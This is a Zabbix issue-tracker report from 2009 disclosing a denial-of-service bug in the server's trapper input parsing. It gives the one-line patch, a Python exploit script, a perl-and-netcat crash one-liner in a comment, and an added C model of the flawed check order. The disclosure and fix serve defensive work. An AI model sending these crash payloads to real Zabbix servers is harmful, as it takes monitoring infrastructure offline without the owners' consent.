[ZBX-993] DoS in Zabbix Server Created: 2009 Jul 21  Updated: 2017 May 30  Resolved: 2009 Jul 21

Status: Closed
Project: ZABBIX BUGS AND ISSUES
Component/s: Proxy (P), Server (S)
Affects Version/s: 1.6
Fix Version/s: 1.6

Type: Incident report Priority: Critical
Reporter: Alexander Vladishev Assignee: Alexander Vladishev
Resolution: Fixed Votes: 0
Labels: None
Remaining Estimate: Not Specified
Time Spent: Not Specified
Original Estimate: Not Specified
Environment:

Zabbix server v1.6.x

Description

While reading Zabbix source code, I found a small error leading to an
easy-to-exploit denial-of-service vulnerability (tested in version 1.6.1
as shipped on Ubuntu and 1.6.5 compiled from source).

In src/zabbix_server/trapper/trapper.c, function process_trap():

    // Make a copy of "s", truncated to 2047 bytes
    strscpy(copy,s);
    // Check if there's some ":" in "s" (and not in "copy"!)
    server=(char *)strtok(s,":");

[...]

    // Look for the 1st ":" in "copy"
    value_string=strchr(copy,':');
    // If the 1st ":" in "s" is after offset 2047,
    // we get a null pointer dereference crash
    value_string=strchr(value_string+1,':');

The patch is trivial: just use "copy" instead of "s" in your check.

    server=(char *)strtok(copy,":");

Exploit code:

8<-----------------------------------------------------------------
#!/usr/bin/python

import socket
import struct

PORT = 10051
HOST = "192.168.2.89"

try:
    # 'sock' instead of 'socket' so the module is not shadowed
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(3)
    sock.connect((HOST, PORT))

    header = 'ZBXD\x01'

    # DoS in ./src/zabbix_server/trapper/trapper.c
    # If first ":" is after 2047 => DoS when reading NULL+1
    data = 'A'*2050 + ':B'

    size = struct.pack('q', len(data))
    sock.send(header + size + data)
    rcvdata = sock.recv(10240)
    print rcvdata
except:
    print "FAIL"

sock.close()
8<-----------------------------------------------------------------
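
The check-order bug and its one-line fix, as an added example that is not Zabbix's code: parse_trap() models process_trap() with a truncated copy of the input and lets you choose whether the ':' presence check runs on the original buffer (the bug) or on the copy (the fix). COPY_LEN, bounded_copy() and the host/key/value field names are assumptions; the 2050-byte input is constructed to match the shape in the report.

```c
#include <string.h>
#define COPY_LEN 2048  /* assumption: the 2047-byte strscpy() truncation plus NUL */
enum { TRAP_OK = 0, TRAP_REJECT = 1, TRAP_WOULD_CRASH = 2 };

/* Bounded copy that always NUL-terminates; stand-in for Zabbix's strscpy(). */
static void bounded_copy(char *dst, size_t dst_len, const char *src)
{
    strncpy(dst, src, dst_len - 1);
    dst[dst_len - 1] = '\0';
}

/* Models the check order in process_trap(). fixed == 0: the ':' presence check
 * runs on the untruncated s (the bug); fixed == 1: it runs on copy, so the later
 * strchr() on copy sees the same bytes and cannot unexpectedly return NULL. */
int parse_trap(const char *s, int fixed, char *host, char *key, char *value, size_t out_len)
{
    char copy[COPY_LEN];
    bounded_copy(copy, sizeof copy, s);

    /* Original: server = strtok(s, ":")  -- checks s, not copy. */
    if (strchr(fixed ? copy : s, ':') == NULL)
        return TRAP_REJECT;

    /* Original: value_string = strchr(copy, ':'); strchr(value_string + 1, ':') */
    const char *first = strchr(copy, ':');
    if (first == NULL)
        return TRAP_WOULD_CRASH;  /* the original dereferenced NULL + 1 here */
    const char *second = strchr(first + 1, ':');
    if (second == NULL)
        return TRAP_REJECT;

    size_t hlen = (size_t)(first - copy), klen = (size_t)(second - first - 1);
    if (hlen >= out_len || klen >= out_len || strlen(second + 1) >= out_len)
        return TRAP_REJECT;
    memcpy(host, copy, hlen);      host[hlen] = '\0';
    memcpy(key, first + 1, klen);  key[klen] = '\0';
    strcpy(value, second + 1);
    return TRAP_OK;
}

/* Constructed input of the shape in the report: 2050 'A' bytes, then ":B".
 * Returns the status the chosen check order would reach. */
int parse_long_trap(int fixed)
{
    static char buf[2053];
    char host[8], key[8], value[8];
    memset(buf, 'A', 2050);
    strcpy(buf + 2050, ":B");
    return parse_trap(buf, fixed, host, key, value, sizeof host);
}
```

With the buggy order the long input reaches the NULL+1 dereference point; with the fixed order it is simply rejected, which is the whole effect of the patch.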



Comments
Comment by Alexander Vladishev [ 2009 Jul 21 ]

Fixed in version pre1.6.6, rev. 7690.

Comment by richlv [ 2009 Sep 15 ]

closing all resolved issues

Comment by Rafael Gomes [ 2009 Dec 15 ]

I got this error with exploit:

File "166.pl", line 18
data = 'A'*2050 + ':B'
^
SyntaxError: invalid syntax

My Zabbix server 1.6.4 was compiled from source.

Is my version affected too?

Comment by richlv [ 2009 Dec 15 ]

as the original comment said, it should be fixed in 1.6.6

ZBX-993#action_16403

Comment by richlv [ 2009 Dec 15 ]

let's try full link then...
https://support.zabbix.com/browse/ZBX-993#action_16403

Comment by Rafael Gomes [ 2009 Dec 15 ]

I just wanna know if my version is affected, because I can't exploit with this code.

Comment by Nicob [ 2009 Dec 15 ]

Indentation of the provided exploit code is broken.

Version 1.6.4 (even from source) is affected, but you may try the following PoC:
perl -e 'print "ZBXD\x01" . "A"x2050 . ":B";' | nc -v 127.0.0.1 10051

Comment by Rafael Gomes [ 2009 Dec 16 ]

Hi Nicob,

Thanks for your help, but I can't exploit it yet.

When I put your code in the server, I didn't get anything and my server is still running.

Generated at Thu Apr 25 09:53:50 EEST 2024 using Jira 9.12.4#9120004-sha1:625303b708afdb767e17cb2838290c41888e9ff0.